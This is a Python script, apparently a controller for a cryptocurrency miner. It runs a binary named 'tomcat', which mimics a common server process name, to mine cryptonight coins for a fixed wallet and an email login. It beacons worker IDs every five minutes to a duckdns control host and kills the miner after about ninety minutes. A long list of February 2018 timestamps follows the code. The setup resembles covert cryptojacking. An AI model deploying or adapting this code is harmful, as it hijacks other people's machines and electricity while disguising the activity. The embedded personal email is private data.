import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:07.597068
#2018-02-17 16:20:07.335308
#2018-02-17 18:07:07.157714
#2018-02-17 19:55:07.361432
#2018-02-17 21:43:02.236070
#2018-02-17 23:27:06.125124
#2018-02-18 01:17:01.744443
#2018-02-18 03:04:05.049050
#2018-02-18 04:51:07.018562
#2018-02-18 06:42:07.910001
#2018-02-18 08:31:01.463648
#2018-02-18 10:18:06.828647
#2018-02-18 12:04:01.375253
#2018-02-18 13:48:07.152478
#2018-02-18 15:38:07.829501
#2018-02-18 17:27:07.002020
#2018-02-18 19:15:07.994910
#2018-02-18 21:01:06.343081
#2018-02-18 22:47:05.051222
#2018-02-19 00:36:01.843970
#2018-02-19 02:22:01.317091
#2018-02-19 04:09:05.271585
#2018-02-19 05:53:06.700929
#2018-02-19 07:41:04.871011
#2018-02-19 09:30:07.404712
#2018-02-19 11:19:07.729959
#2018-02-19 13:07:05.247511
#2018-02-19 14:55:05.569767
#2018-02-19 16:42:10.044941
#2018-02-19 18:31:08.844317
#2018-02-19 20:18:01.641071
#2018-02-19 22:06:06.997180
#2018-02-19 23:53:04.094748
#2018-02-20 01:40:01.676292
#2018-02-20 03:28:05.829014
#2018-02-20 05:14:08.030142
#2018-02-20 06:56:05.126824
#2018-02-20 08:43:04.236952
#2018-02-20 10:27:04.090088
#2018-02-20 12:12:04.075686
#2018-02-20 14:01:08.565948
#2018-02-20 15:44:03.931296
#2018-02-20 17:34:02.031621
#2018-02-20 19:22:09.530303
#2018-02-20 21:11:09.622826
#2018-02-20 22:57:06.611537
#2018-02-21 00:39:02.199944
#2018-02-21 02:26:06.670122
#2018-02-21 04:12:10.860548
#2018-02-21 06:01:04.118686
#2018-02-21 07:48:04.489070
#2018-02-21 09:28:05.519794
#2018-02-21 11:17:04.560532
#2018-02-21 13:04:06.325127
#2018-02-21 14:51:03.728570
#2018-02-21 16:39:11.831256
#2018-02-21 18:29:08.382586
#2018-02-21 20:14:07.651732
#2018-02-21 22:02:06.238762
#2018-02-21 23:49:07.797200
#2018-02-22 01:39:06.822647
#2018-02-22 03:27:05.884120
#2018-02-22 05:14:04.278398
#2018-02-22 06:58:05.229340
#2018-02-22 08:46:07.345715
#2018-02-22 10:35:05.135493
#2018-02-22 12:20:10.257985
#2018-02-22 14:04:07.730255
#2018-02-22 15:52:08.551616
#2018-02-22 17:39:01.635477
#2018-02-22 19:25:08.795646
#2018-02-22 21:16:06.750839
#2018-02-22 23:02:07.214188
#2018-02-23 00:49:07.916607
#2018-02-23 02:37:07.698045
#2018-02-23 04:25:04.692407
#2018-02-23 06:10:10.557152
#2018-02-23 07:57:04.235164
#2018-02-23 10:13:07.932708
#2018-02-23 12:08:01.788340
#2018-02-23 13:55:03.228611
#2018-02-23 15:48:09.160263
#2018-02-23 17:33:08.566311
#2018-02-23 19:21:01.620686
#2018-02-23 21:03:06.748682
#2018-02-23 22:47:04.296454
#2018-02-24 00:31:07.050798
#2018-02-24 02:22:07.548785
#2018-02-24 04:11:06.942868
#2018-02-24 05:59:01.256498
#2018-02-24 07:47:07.337071
#2018-02-24 09:32:07.348194
#2018-02-24 11:25:05.357437
#2018-02-24 13:14:05.811491
#2018-02-24 15:04:07.060086
#2018-02-24 16:53:07.100931
#2018-02-24 18:41:07.999706
#2018-02-24 20:31:07.113642
#2018-02-24 22:30:07.605456
#2018-02-25 02:51:07.277801
#2018-02-25 05:31:04.808972
#2018-02-25 08:10:03.717225
#2018-02-25 11:41:06.602544
#2018-02-25 14:14:01.206570
#2018-02-25 15:49:01.896098